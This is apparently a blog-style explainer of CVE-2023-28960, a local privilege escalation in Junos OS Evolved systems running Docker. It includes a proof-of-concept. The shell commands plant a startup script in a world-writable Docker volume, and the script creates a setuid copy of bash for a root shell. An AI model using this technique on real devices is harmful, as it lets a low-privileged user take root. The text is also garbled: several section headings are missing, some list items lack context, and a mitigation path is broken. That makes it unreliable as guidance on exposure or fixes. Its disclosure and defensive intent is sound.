Juniper Networks' Junos OS Evolved is a widely deployed network operating system in large enterprises and service providers. In early 2023, a critical vulnerability—CVE-2023-28960—was disclosed. This flaw lets an attacker with only local, low-privileged access plant malicious files into Docker containers running on affected devices. If an administrator unwittingly starts the container, the attacker's payload could run as root.
In this article, I’ll break down the bug in plain language, explain what makes it possible, show how it can be exploited, and provide all the key details for staying secure.
[References and Further Reading](#references)
1. What is CVE-2023-28960?
CVE-2023-28960 falls under the category of Incorrect Permission Assignment for Critical Resource (CWE-732). In simple terms: Junos OS Evolved systems with Docker enabled had permissions set up so local users could copy files straight into directories used by running Docker containers.
That means a regular user—not an admin—could drop a malicious shell script or binary. Later, if an administrator restarts or starts the container, those files get executed as root.
Docker is installed and running on your device.
If Docker is not running, you are *not* vulnerable.
Not affected:
Classic Junos OS.
3. Why is This Dangerous?
- Privilege Escalation: The attacker uploads a payload as an ordinary user, but it later runs as root (because Docker containers typically run as root).
- Persistence/Backdoor: Even if an attacker loses access, their backdoor can remain dormant until triggered.
Lateral Movement: From inside the compromised container, the attacker might pivot further.
Attacker logs in as a low-privileged local user.
2. Drops a malicious file (such as a backdoored shell script or executable) *into* a mounted Docker volume or a directory that gets added to the container.
When the container starts, malicious files run as root inside the container.
This is possible because the permissions on critical Docker directories were set incorrectly, so regular users could write to them.
5. Proof-of-Concept Example
*Assuming a low-privileged user on an impacted Junos OS Evolved system with Docker running.*
Let’s say the system has a Docker container using the host directory /var/lib/docker/volumes/app-data/_data.
Step 1: Identify a writable Docker volume
ls -ld /var/lib/docker/volumes/app-data/_data
Output (insecure permissions)
drwxrwxrwx 3 root root 4096 Jun 5 10:36 /var/lib/docker/volumes/app-data/_data/
Notice the drwxrwxrwx (777) permissions. Any user can write here.
Step 2: Place a Malicious Script
echo -e '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /var/lib/docker/volumes/app-data/_data/startup.sh
chmod +x /var/lib/docker/volumes/app-data/_data/startup.sh
Step 3: Wait for Admin to Start Container
If the Dockerfile or entrypoint runs /data/startup.sh (very common with apps), the script runs as root when the container starts.
Step 4: Profit
Now, there’s a root shell waiting as /tmp/rootbash on the host (if the volume is mounted into the container with root privileges).
`bash
find /var/lib/docker -type d -perm -o+w
`bash
chmod o-w /var/lib/docker/volumes//_data
Audit User Accounts: Remove & monitor unnecessary local accounts.
7. References
- Official Juniper Advisory: JSA71630
- NVD Entry: CVE-2023-28960
- CWE-732: Incorrect Permission Assignment for Critical Resource: MITRE CWE-732
- What is Docker? (Docker documentation)
Summary
CVE-2023-28960 is a serious local privilege escalation bug for Junos OS Evolved with Docker enabled. It exists because of incorrect permissions on Docker resources, letting low-privileged users plant files that later run as root. The fix is straightforward: patch, lock down permissions, and remove Docker if unused.
Timeline
Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC